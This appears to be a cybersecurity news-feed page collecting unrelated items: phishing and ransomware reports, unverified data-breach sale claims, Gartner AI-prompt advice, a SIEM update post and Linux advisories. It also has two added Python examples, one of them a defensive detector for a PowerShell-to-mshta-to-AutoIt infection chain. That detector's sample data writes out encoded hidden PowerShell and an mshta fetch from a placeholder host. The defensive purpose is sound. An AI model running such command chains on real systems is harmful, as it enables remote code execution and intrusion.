The researchers advised email recipients to remain cautious when handling unsolicited emails, even if they appear to be from legitimate sources, to avoid falling victim to the phishing campaign. Recipients should refrain from opening attachment files or clicking on links until they can verify the email sender and its content. "Users must take extra caution when handling files from unknown sources, especially the URLs and attachments of emails," the researchers emphasized. Additionally, recipients should be wary of any message that prompts them to execute commands, as this is a common tactic used by attackers to compromise systems. Upon receiving such requests, it is recommended to either ignore the email or report it to your organization's IT security team. The researchers also shared various indicators of compromise (IOCs), such as Base64-encoded PowerShell commands, HTA files and AutoIt scripts, download URLs, file signatures and behavioral indicators associated with the campaign.
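For defenders, the chain described above is more useful as a process-lineage pattern than as a list of hashes. The following is an added detection example (not AhnLab's code or its published IOCs) that runs three heuristics over constructed process-creation records: PowerShell launched from the Run dialog with an encoded command, PowerShell spawning mshta.exe with a remote URL, and AutoIt3.exe run with a .a3x script. The record layout, rule names and sample events are assumptions for illustration, and the encoded command is a harmless placeholder.

```python
"""Heuristic detection of the 'paste and run' process chain.

Added example, not AhnLab's code or its published indicators. Records are
constructed here in a simplified, Sysmon-like shape (parent image, image,
command line); the rule names and the sample events are this example's own.
"""
import base64
import re

RUN_DIALOG_PARENT = "explorer.exe"   # Win+R launches through the shell process
# PowerShell accepts any unambiguous prefix of -EncodedCommand; longest first.
_ENC_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
_A3X_ARG = re.compile(r"\.a3x\b", re.IGNORECASE)
_URL = re.compile(r"https?://", re.IGNORECASE)


def encode_powershell(script: str) -> str:
    """-EncodedCommand takes base64 of the UTF-16LE script text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Recover the plaintext of an -enc argument, or None if absent/undecodable."""
    m = _ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def _name(image: str) -> str:
    """Bare, lower-cased executable name from a full path."""
    return image.rsplit("\\", 1)[-1].lower()


def match_rules(event: dict) -> list:
    """Return the names of the rules an individual record trips."""
    parent, image, cmd = _name(event["parent"]), _name(event["image"]), event["cmdline"]
    hits = []
    # Stage 1: PowerShell pasted into the Run dialog, typically hidden and encoded.
    if parent == RUN_DIALOG_PARENT and image == "powershell.exe" and (
        _ENC_FLAG.search(cmd) or "hidden" in cmd.lower()
    ):
        hits.append("run_dialog_powershell")
    # Stage 2: the script fetches and runs an HTA from a remote host.
    if parent == "powershell.exe" and image == "mshta.exe" and _URL.search(cmd):
        hits.append("powershell_spawns_remote_hta")
    # Stage 3: the HTA launches the AutoIt interpreter with a compiled .a3x script.
    if image == "autoit3.exe" and _A3X_ARG.search(cmd):
        hits.append("autoit_a3x_execution")
    return hits


def detect_chain(events: list) -> dict:
    """Run all rules over one host's records; report hits and whether all three
    stages were observed, which is the strongest signal for this campaign."""
    hits = [(i, r) for i, ev in enumerate(events) for r in match_rules(ev)]
    stages = {r for _, r in hits}
    return {"hits": hits, "full_chain": len(stages) == 3}


# Constructed sample records, not real telemetry. The encoded command is a
# harmless placeholder so the sample itself does nothing.
SAMPLE_EVENTS = [
    {"parent": "C:\\Windows\\explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -w hidden -enc "
                + encode_powershell("Write-Output 'constructed sample'")},
    {"parent": "powershell.exe", "image": "C:\\Windows\\System32\\mshta.exe",
     "cmdline": "mshta.exe http://placeholder.invalid/constructed.hta"},
    {"parent": "mshta.exe", "image": "C:\\Users\\Public\\AutoIt3.exe",
     "cmdline": "AutoIt3.exe C:\\Users\\Public\\script.a3x"},
    {"parent": "explorer.exe", "image": "notepad.exe",
     "cmdline": "notepad.exe C:\\Users\\user\\notes.txt"},
]

if __name__ == "__main__":
    result = detect_chain(SAMPLE_EVENTS)
    for idx, rule in result["hits"]:
        print(f"event {idx}: {rule}")
    print("full chain observed:", result["full_chain"])
    print("decoded stage-1 command:", decode_encoded_command(SAMPLE_EVENTS[0]["cmdline"]))
```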
The Akira ransomware group has allegedly targeted E-T-A Elektrotechnische Apparate GmbH, an organization located in Germany. The ransomware group claims to have stolen 24 gigabytes of sensitive material, including customer information, non-disclosure agreements (NDAs), financial records, and employee personal information. To substantiate these claims, the threat actor has attached a screenshot purportedly showing this information.

E-T-A Elektrotechnische Apparate GmbH operates six production facilities and has a presence in 60 countries worldwide. The company's product range includes a variety of electrical protection solutions essential to numerous industries. The company is renowned for manufacturing circuit breakers, electronic circuit protectors, and various other electronic components.

Despite the ransomware group's claims, the company's official website appeared to be fully functional, and there were no signs of foul play. To verify Akira's claims of a cyberattack on E-T-A, The Cyber Express Team reached out to E-T-A Elektrotechnische Apparate GmbH for an official statement. As of the time of writing, no response has been received from the company. This leaves the ransomware claims unverified, with no confirmation or denial from E-T-A's officials.

Akira Ransomware: Previous Track Record

The Akira ransomware gang has emerged as a threat to small and medium-sized businesses (SMBs), mostly in Europe, North America, and Australia. The group uses advanced tactics to infiltrate systems, frequently gaining unauthorized access to a company's virtual private networks (VPNs). Sophos X-Ops research shows that Akira often uses compromised login credentials or exploits weaknesses in VPN technologies such as Cisco ASA SSL VPN or Cisco AnyConnect.

Recently, in May 2024, Akira targeted Western Dovetail, a well-known woodworking shop. In April 2024, Akira was identified as the gang responsible for a series of cyberattacks against businesses and key infrastructure in North America, Europe, and Australia. According to the US Federal Bureau of Investigation (FBI), Akira has hacked over 250 firms since March 2023, collecting roughly $42 million in ransom payments. Initially, Akira's attacks targeted Windows systems. However, the gang has since broadened its tactics to include Linux computers, causing concern among international cybersecurity agencies. These cyberattacks show Akira's strategy of targeting a wide range of industries and businesses of all sizes, frequently resulting in major operational disruptions and financial losses.

As it stands, the Akira ransomware group's claims regarding the E-T-A cyberattack are unsubstantiated. The lack of an official response from the company creates a vacuum in the confirmation of these claims. While the company's website is still operational, signaling no immediate disruption, a data breach might have serious consequences, compromising client confidentiality, financial integrity, and employee privacy.
AI has been a major focus of the Gartner Security and Risk Management Summit in National Harbor, Maryland this week, and the consensus has been that while large language models (LLMs) have so far overpromised and under-delivered, there are still AI threats and defensive use cases that cybersecurity pros need to be aware of.

Jeremy D’Hoinne, Gartner Research VP for AI & Cybersecurity, told conference attendees that hacker uses of AI so far include improved phishing and social engineering – with deepfakes a particular concern. But D’Hoinne and Director Analyst Kevin Schmidt agreed in a joint panel that no novel attack techniques have arisen from AI yet, just improvements on existing attack techniques like business email compromise (BEC) or voice scams. AI security tools likewise remain underdeveloped, with AI assistants perhaps the most promising cybersecurity application so far, able to potentially help with patching, mitigations, alerts and interactive threat intelligence. D’Hoinne cautions that the tools should be used as an adjunct to security staff so they don’t lose their ability to think critically.

AI Prompt Engineering for Cybersecurity: Precision Matters

Using AI assistants and LLMs for cybersecurity use cases was the focus of a separate presentation by Schmidt, who cautioned that AI prompt engineering needs to be very specific for security uses to overcome the limitations of LLMs, and that even then the answer may only get you 70%-80% of the way toward your goal. Outputs need to be validated, and junior staff will require the oversight of senior staff, who will be able to determine the significance of the output more quickly. Schmidt also cautioned that chatbots like ChatGPT should only be used with noncritical data.

Schmidt gave examples of good and bad AI security prompts for helping security operations teams. “Create a query in my <name of SIEM> to identify suspicious logins” is too vague, he said. He gave an example of a better way to craft a SIEM query: “Create a detection rule in <name of SIEM> to identify suspicious logins from multiple locations within the last 24 hours. Provide the <SIEM> query language and explain the logic behind it and place the explanations in tabular format.” That prompt should produce something like the following output:

(Image: SIEM query AI prompt output; source: Gartner)

Analyzing firewall logs was another example. Schmidt gave the following as an example of an ineffective prompt: “Analyze the firewall logs for any unusual patterns or anomalies.” A better prompt would be: “Analyze the firewall logs from the past 24 hours and identify any unusual patterns or anomalies. Summarize your findings in a report format suitable for a security team briefing.” That produced the following output:

(Image: Firewall log prompt output; source: Gartner)

Another example involved XDR tools. Instead of a weak prompt like “Summarize the top two most critical security alerts in a vendor’s XDR,” Schmidt recommended something along these lines: “Summarize the top two most critical security alerts in a vendor’s XDR, including the alert ID, description, severity and affected entities. This will be used for the monthly security review report. Provide the response in tabular form.” That prompt produced the following output:

(Image: XDR alert prompt output; source: Gartner)

Other Examples of AI Security Prompts

Schmidt gave two more examples of good AI prompts, one on incident investigation and another on web application vulnerabilities. For security incident investigations, an effective prompt might be: “Provide a detailed explanation of incident DB2024-001. Include the timeline of events, methods used by the attacker and the impact on the organization. This information is needed for an internal investigation report. Produce the output in tabular form.” That prompt should lead to something like the following output:

(Image: Incident response AI prompt output; source: Gartner)

For web application vulnerabilities, Schmidt recommended the following approach: “Identify and list the top five vulnerabilities in our web application that could be exploited by attackers. Provide a brief description of each vulnerability and suggest mitigation steps. This will be used to prioritize our security patching efforts. Produce this in tabular format.” That should produce something like this output:

(Image: Web application vulnerability prompt output; source: Gartner)

Tools for AI Security Assistants

Schmidt listed some of the GenAI tools that security teams might use, ranging from chatbots to SecOps AI assistants – such as CrowdStrike Charlotte AI, Microsoft Copilot for Security, SentinelOne Purple AI and Splunk AI – and startups such as AirMDR, Crogl, Dropzone and Radiant Security (see Schmidt’s slide below).

(Image: GenAI tools for possible cybersecurity use; source: Gartner)
Advance Auto Parts, Inc., a significant provider of automobile aftermarket components, has allegedly suffered a massive data breach. A threat actor going by the handle "Sp1d3r" has claimed responsibility for the Advance Auto Parts data breach. The threat actor further claims to have stolen three terabytes of data from the company's Snowflake cloud storage. The stolen information is allegedly being sold for US$1.5 million.

According to the threat actor's post, the stolen data includes:
- 380 million customer profiles, containing names, emails, mobile numbers, phone numbers, addresses, and more.
- 44 million loyalty/gas card numbers, along with customer details.
- Information on 358,000 employees, though the company currently employs around 68,000 people. This discrepancy suggests the data might include records of former employees.
- Auto parts and part numbers.
- 140 million customer orders.
- Sales history.
- Employment candidate information, including Social Security numbers, driver's license numbers, and demographic details.
- Transaction tender details.
- Over 200 tables of various data.

The threat actor has specified that a middleman is required to facilitate the sale of the stolen data, and that no dealings will be conducted via Telegram. Worth noting is that in its post the threat actor claims to be selling the information of 358,000 employees, despite the fact that the organization now employs approximately 68,000 people. The disparity could be due to old data from former employees and associates.

(Image source: X)

(Image source: X)

To verify the threat actor's claims, The Cyber Express Team reached out to company officials; as of writing this news report, no response has been received. The claims therefore remain neither confirmed nor denied.

Advance Auto Parts operates 4,777 stores and 320 Worldpac branches primarily within the United States, with additional locations in Canada, Puerto Rico, and the U.S. Virgin Islands. The company also serves 1,152 independently owned Carquest branded stores across these locations, as well as in Mexico and various Caribbean islands.

Advance Auto Parts Data Breach: Linked to Snowflake Cyberattacks

The Advance Auto Parts data breach is part of a recent series of attacks targeting customers of Snowflake, a cloud storage company. These attacks have been ongoing since at least mid-April 2024. Snowflake acknowledged the issue in a statement, informing a limited number of customers that it believes may have been impacted by the attacks. However, Snowflake did not provide specific details about the nature of the cyberattacks or confirm whether data had been stolen from customer accounts.

This incident follows another significant breach involving Live Nation, the parent company of Ticketmaster. Hackers claimed to have stolen personal details of 560 million customers, and the stolen data was hosted on Snowflake's cloud storage. Live Nation disclosed this breach in a filing to the U.S. Securities and Exchange Commission (SEC), revealing that a criminal actor had offered the company's user data for sale on the dark web. In response to the breach, Snowflake and third-party cybersecurity experts CrowdStrike and Mandiant issued a joint statement regarding their ongoing investigation into the targeted threat campaign against some Snowflake customer accounts. They are working to understand the extent of the breach and mitigate its impact.

Screenshots shared by the threat actor indicate that the leaked data contains numerous references to 'SNOWFLAKE,' supporting the claim that it was stolen during the recent Snowflake data theft attacks. The full extent of the data breach and its implications for Advance Auto Parts and other companies using Snowflake remain to be seen. Given Snowflake's large client base and the significant volume of data it manages, the repercussions could be widespread. Only time will tell how many more companies will disclose data breaches linked to the recent Snowflake attacks.

In the meantime, affected customers and employees are advised to monitor their personal information closely and take the necessary precautions to protect their data. Companies utilizing Snowflake's services should stay vigilant and follow cybersecurity best practices to safeguard their data against potential threats.
A security information and event management (SIEM) system can't remain static; its detection logic needs to constantly evolve. The threat landscape is ever-changing, which means you need to keep adding new rules regularly for effective data analysis. Admittedly, the bulk of correlation rules are inevitably fine-tuned by the internal information security team, but having up-to-date rules out of the box is crucial in easing this process. Another important point is that a SIEM system must be capable of adapting to the evolution of the corporate IT infrastructure, and be prepared to use new event sources – each of which often requires a new normalizer (the mechanism for converting data from arbitrary sources to a single format). We're constantly working on this, adding new normalizers and correlation rules to the Kaspersky Unified Monitoring and Analysis Platform. This post details what was added in version 3.0.3.

New and refined normalizers

Between versions 2.1 and 3.0.3 of the Kaspersky Unified Monitoring and Analysis Platform, we released 99 update packages with new or improved normalizers. These include 63 updates that provide support for new event sources, and 38 that improve existing normalizers by adding support for new event types and making various refinements and fixes. The remaining updates contain continuously enhanced correlation rules, filters, and other usability-oriented resources.

Other new additions include normalizers that introduce support for the following event sources:
- Cisco Prime, for Cisco Prime 3.10 events received through syslog
- PowerDNS, for processing PowerDNS Authoritative Server 4.5 events received through syslog
- Microsoft Active Directory Federation Service (AD FS), for processing Microsoft AD FS events. The normalizer provides support for this event source starting with Kaspersky Unified Monitoring and Analysis Platform version 3.0.1
- Microsoft Active Directory Domain Service (AD DS), for processing Microsoft AD DS events. The normalizer also provides support for this event source starting with Kaspersky Unified Monitoring and Analysis Platform version 3.0.1
- NetApp ([OOTB] NetApp syslog, for processing NetApp ONTAP 9.12 events received through syslog; and [OOTB] NetApp file, for processing NetApp ONTAP 9.12 events stored in a file)
- RedCheck Desktop, for processing RedCheck Desktop 2.6 logs stored in a file
- MikroTik networking hardware
- PostgreSQL DBMS
- MySQL DBMS
- VMware ESXi
- Microsoft 365

In addition, our experts have refined the following normalizers:
- For Microsoft products: revised the normalizer structure and added support for new products and additional event types
- For PT NAD: implemented support for events of the current product version
- For UNIX-like operating systems: implemented support for additional event types
- For Juniper networking devices: made significant normalizer revisions and optimizations
- For Citrix NetScaler: implemented support for additional event types

Updated correlation rules

We've significantly improved the content of all existing correlation rules in the SOC Content package, while focusing on validating rule logic and refining the rules with inputs from our customers' real-life experiences. We've also improved the quality of the rule descriptions, including incident description rules. Along with updating the Russian-language SOC Content package, we've also released a full-fledged English-language SOC Content package, fully synchronizing its content with the Russian version. From now on, we plan to update the two packages in sync. The platform now offers over 500 rules, along with further essential tools such as active lists, filters, and dictionaries.

Correlation rule format

We're planning to add markup for existing rules soon in accordance with MITRE ATT&CK® tactics and techniques. This will expand the system's capabilities to visualize the level of protection against all known threats. When choosing avenues for development, we generally align with the MITRE ATT&CK® knowledge base – the de facto industry standard. We also consider feedback from our customers that we get during pilots, integration projects, consulting sessions, or even in emails received by account managers, as well as the experiences of our own SOC – one of the most successful and skilled teams in the industry.

How updates are delivered to the SIEM system

All the content we develop is distributed through the Kaspersky Update Servers subsystem to shorten delivery times. The subsystem requests updates and notifies of them in automated mode, but lets the operator decide on applying them. This helps administrators receive information about available updates quickly, review the contents of each update, and decide whether to introduce new resources in the infrastructure or update existing ones. The update subsystem significantly expands the capabilities of the Kaspersky Unified Monitoring and Analysis Platform to respond rapidly to changes in the threat landscape and infrastructure. The option to use it without direct internet access ensures that data processed by the SIEM system remains secure and within the perimeter, while users can still get the latest system content updates. The complete list of event sources supported in Kaspersky Unified Monitoring and Analysis Platform 3.0.3 is available in the technical support section, where you can also find information about the correlation rules. Of course, our SIEM updates aren't limited to new normalizers and detection logic: we recently wrote about UI enhancements and routine automation.
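The post relies on two concepts, a normalizer that maps any source into a single event format and correlation rules that then run over that unified stream (later to be tagged with MITRE ATT&CK techniques). The following added illustration is not KUMA code and uses no real product log syntax: two constructed raw formats are normalized into one schema, and a single brute-force correlation rule counts failures across both sources without knowing which one they came from.

```python
"""Normalizer and correlation rule pipeline.

Added illustration of the two concepts in the post; this is not KUMA code, and
the two raw log formats are constructed for the example, not real product syntax.
"""
import re
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass
class Event:
    """The single format every normalizer emits, regardless of source."""
    ts: datetime
    source: str
    src_ip: str
    user: str
    outcome: str  # "success" or "failure"


# Constructed raw formats for two hypothetical sources.
_SSH_LINE = re.compile(
    r"^(?P<ts>\S+) \S+ sshd\[\d+\]: (?P<res>Failed|Accepted) password for (?P<user>\S+) from (?P<ip>\S+)"
)
_DB_LINE = re.compile(
    r'^(?P<ts>\S+) db-auth user="(?P<user>[^"]+)" client=(?P<ip>\S+) result=(?P<res>OK|DENIED)'
)


def normalize_ssh(line: str):
    """Normalizer for the constructed SSH format."""
    m = _SSH_LINE.match(line)
    if not m:
        return None
    return Event(datetime.fromisoformat(m["ts"]), "ssh", m["ip"], m["user"],
                 "failure" if m["res"] == "Failed" else "success")


def normalize_db(line: str):
    """Normalizer for the constructed database-auth format."""
    m = _DB_LINE.match(line)
    if not m:
        return None
    return Event(datetime.fromisoformat(m["ts"]), "db", m["ip"], m["user"],
                 "failure" if m["res"] == "DENIED" else "success")


NORMALIZERS = (normalize_ssh, normalize_db)


def normalize(line: str):
    """Try each registered normalizer; unknown formats are dropped, not guessed."""
    for fn in NORMALIZERS:
        ev = fn(line)
        if ev is not None:
            return ev
    return None


def brute_force_rule(events, threshold=3, window=timedelta(seconds=60)):
    """Correlation rule over the unified stream: `threshold` or more failed
    logins from one source IP within `window`, counted across all sources.
    Tagged with MITRE ATT&CK T1110 (Brute Force) for coverage visualization."""
    failures = sorted((e for e in events if e.outcome == "failure"), key=lambda e: e.ts)
    by_ip = {}
    for e in failures:
        by_ip.setdefault(e.src_ip, []).append(e)
    alerts = []
    for ip, evs in by_ip.items():
        for i in range(len(evs)):
            j = i
            while j + 1 < len(evs) and evs[j + 1].ts - evs[i].ts <= window:
                j += 1
            if j - i + 1 >= threshold:
                alerts.append({"src_ip": ip, "count": j - i + 1,
                               "sources": sorted({e.source for e in evs[i:j + 1]}),
                               "technique": "T1110"})
                break  # one alert per IP per evaluation
    return alerts


# Constructed sample lines (documentation IPs; not real logs).
SAMPLE_LINES = [
    "2024-06-06T10:00:01 host1 sshd[2201]: Failed password for root from 198.51.100.7",
    '2024-06-06T10:00:12 db-auth user="admin" client=198.51.100.7 result=DENIED',
    "2024-06-06T10:00:40 host1 sshd[2203]: Failed password for admin from 198.51.100.7",
    "2024-06-06T10:00:45 host1 sshd[2204]: Failed password for guest from 203.0.113.9",
    "2024-06-06T10:01:30 host1 sshd[2210]: Accepted password for alice from 192.0.2.50",
    "2024-06-06T10:01:31 unknown-format line that no normalizer understands",
]


def run_pipeline(lines):
    """Normalize every line, then evaluate the correlation rule on the result."""
    events = [ev for ev in map(normalize, lines) if ev is not None]
    return events, brute_force_rule(events)


if __name__ == "__main__":
    events, alerts = run_pipeline(SAMPLE_LINES)
    print(f"{len(events)} events normalized from {len(SAMPLE_LINES)} lines")
    for a in alerts:
        print(a)
```

The point of the single schema is visible in the alert: the rule sees the SSH and database failures from 198.51.100.7 as one sequence, and adding a new event source only requires a new normalizer, never a change to the rule.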
Episode 350 of the Kaspersky Transatlantic Cable podcast kicks off with the surprising news that whilst generative AI tools such as ChatGPT and MidJourney are marketed aggressively, they're not actually that popular with everyday folk – just 2% of people in the UK say they use Gen AI in their day. From there the talk moves to two large data breaches, both carried out by the same group, ShinyHunters. To wrap up, the team discuss a story about Microsoft's India X account, which was recently hacked in order to spread crypto scams. If you liked what you heard, please consider subscribing.

- AI products like ChatGPT much hyped but not much used
- Ticketmaster hacked. Breach affects more than half a billion users
- Santander staff and 30 million customers hacked
- Microsoft India's X account hijacked in Roaring Kitty crypto scam
With companies pouring billions into AI software and hardware, these installations need to be protected from cybersecurity threats and other security lapses.
In the rush to digital transformation, many organizations are exposed to security risks associated with citizen developer applications without even knowing it.
Inside the baseball team's strategy for building next-gen security operations through zero trust and a raft of future initiatives aiming to safeguard team data, fan info, and the iconic Fenway Park — which, by the way, is now a smart stadium.
Four suspects were taken into custody, accused of paying intermediaries in Moldova to inform criminals of their Red Notice status and wipe law-enforcement flags from the system.
Ubuntu Security Notice 6814-1 - Xiantong Hou discovered that libvpx did not properly handle certain malformed media files. If an application using libvpx opened a specially crafted file, a remote attacker could cause a denial of service, or possibly execute arbitrary code.
Debian Linux Security Advisory 5706-1 - An integer overflow vulnerability in the rar e8 filter was discovered in libarchive, a multi-format archive and compression library, which may result in the execution of arbitrary code if a specially crafted RAR archive is processed.
Ubuntu Security Notice 6813-1 - It was discovered that the Hotspot component of OpenJDK 21 incorrectly handled certain exceptions with specially crafted long messages. An attacker could possibly use this issue to cause a denial of service. It was discovered that OpenJDK 21 incorrectly performed reverse DNS query under certain circumstances in the Networking/HTTP client component. An attacker could possibly use this issue to obtain sensitive information.
OpenSSL is a robust, fully featured Open Source toolkit implementing the Secure Sockets Layer and Transport Layer Security protocols with full-strength cryptography world-wide.
Debian Linux Security Advisory 5705-1 - A use-after-free was discovered in tinyproxy, a lightweight, non-caching, optionally anonymizing HTTP proxy, which could result in denial of service.
Ubuntu Security Notice 6567-2 - USN-6567-1 fixed vulnerabilities in QEMU. The fix for CVE-2023-2861 was too restrictive and introduced a behavior change leading to a regression in certain environments. This update fixes the problem. Gaoning Pan and Xingwei Li discovered that QEMU incorrectly handled the USB xHCI controller device. A privileged guest attacker could possibly use this issue to cause QEMU to crash, leading to a denial of service. Various other issues were also addressed.
Red Hat Security Advisory 2024-3701-03 - An update for nghttp2 is now available for Red Hat Enterprise Linux 8.8 Extended Update Support. Issues addressed include a denial of service vulnerability.
Red Hat Security Advisory 2024-3685-03 - An update for java-1.8.0-ibm is now available for Red Hat Enterprise Linux 8. Issues addressed include a denial of service vulnerability.
Red Hat Security Advisory 2024-3680-03 - Red Hat OpenShift Service Mesh Containers for 2.4.8. Issues addressed include a denial of service vulnerability.
Debian Linux Security Advisory 5704-1 - Multiple security issues were discovered in Pillow, a Python imaging library, which could result in denial of service or the execution of arbitrary code if malformed images are processed.
Ubuntu Security Notice 6809-1 - It was discovered that BlueZ could be made to dereference invalid memory. An attacker could possibly use this issue to cause a denial of service. This issue only affected Ubuntu 22.04 LTS. It was discovered that BlueZ could be made to write out of bounds. If a user were tricked into connecting to a malicious device, an attacker could possibly use this issue to cause a denial of service or execute arbitrary code.
Ubuntu Security Notice 6812-1 - It was discovered that the Hotspot component of OpenJDK 17 incorrectly handled certain exceptions with specially crafted long messages. An attacker could possibly use this issue to cause a denial of service. It was discovered that OpenJDK 17 incorrectly performed reverse DNS query under certain circumstances in the Networking/HTTP client component. An attacker could possibly use this issue to obtain sensitive information.
Ubuntu Security Notice 6811-1 - It was discovered that the Hotspot component of OpenJDK 11 incorrectly handled certain exceptions with specially crafted long messages. An attacker could possibly use this issue to cause a denial of service. It was discovered that OpenJDK 11 incorrectly performed reverse DNS query under certain circumstances in the Networking/HTTP client component. An attacker could possibly use this issue to obtain sensitive information.
Ubuntu Security Notice 6810-1 - It was discovered that the Hotspot component of OpenJDK 8 incorrectly handled certain exceptions with specially crafted long messages. An attacker could possibly use this issue to cause a denial of service. Vladimir Kondratyev discovered that the Hotspot component of OpenJDK 8 incorrectly handled address offset calculations in the C1 compiler. An attacker could possibly use this issue to cause a denial of service or execute arbitrary code.
Ubuntu Security Notice 6808-1 - It was discovered that Atril was vulnerable to a path traversal attack. An attacker could possibly use this vulnerability to create arbitrary files on the host filesystem with user privileges.
Red Hat Security Advisory 2024-3669-03 - An update for less is now available for Red Hat Enterprise Linux 7. Issues addressed include a code execution vulnerability.
Cybersecurity researchers have discovered a malicious Python package uploaded to the Python Package Index (PyPI) repository that's designed to deliver an information stealer called Lumma (aka LummaC2). The package in question is crytic-compilers, a typosquatted version of a legitimate library named crytic-compile. The rogue package was downloaded 441 times before it was taken down by PyPI
Google has announced plans to store Maps Timeline data locally on users' devices instead of their Google account effective December 1, 2024. The changes were originally announced by the tech giant in December 2023, alongside changes to the auto-delete control when enabling Location History by setting it to three months by default, down from the previous limit of 18 months. Google Maps Timeline,
Learn about critical threats that can impact your organization and the bad actors behind them from Cybersixgill’s threat experts. Each story shines a light on underground activities, the threat actors involved, and why you should care, along with what you can do to mitigate risk. In an increasingly interconnected world, supply chain attacks have emerged as a formidable threat, compromising
Tom works for a reputable financial institution. He has a long, complex password that would be near-impossible to guess. He’s memorized it by heart, so he started using it for his social media accounts and on his personal devices too. Unbeknownst to Tom, one of these sites has had its password database compromised by hackers and put it up for sale on the dark web. Now threat actors are working
Threat actors are increasingly abusing legitimate and commercially available packer software such as BoxedApp to evade detection and distribute malware such as remote access trojans and information stealers. "The majority of the attributed malicious samples targeted financial institutions and government industries," Check Point security researcher Jiri Vinopal said in an analysis. The volume of
The distributed denial-of-service (DDoS) botnet known as Muhstik has been observed leveraging a now-patched security flaw impacting Apache RocketMQ to co-opt susceptible servers and expand its scale. "Muhstik is a well-known threat targeting IoT devices and Linux-based servers, notorious for its ability to infect devices and utilize them for cryptocurrency mining and launching Distributed Denial
Did your company fall victim to the LockBit ransomware? Have cybercriminals left gigabytes of your data encrypted, with no easy route for recovery that doesn't involve paying a ransom? Well, don't fear... Read more in my article on the Tripwire State of Security blog.
Drones, some coloured cardboard, and a piece of tinfoil may be all the kit you need to crash a robot-driven taxi, and a rapper is accused of using Justin Bieber's name to defraud a TV company. All this and more is discussed in the latest edition of the "Smashing Security" podcast by cybersecurity veterans Graham Cluley and Carole Theriault.
$90,000/year, full home office, and 30 days of paid leave, and all for a job as a junior data analyst – unbelievable, right? This and many other job offers are fake though – made just to ensnare unsuspecting victims into giving up their data.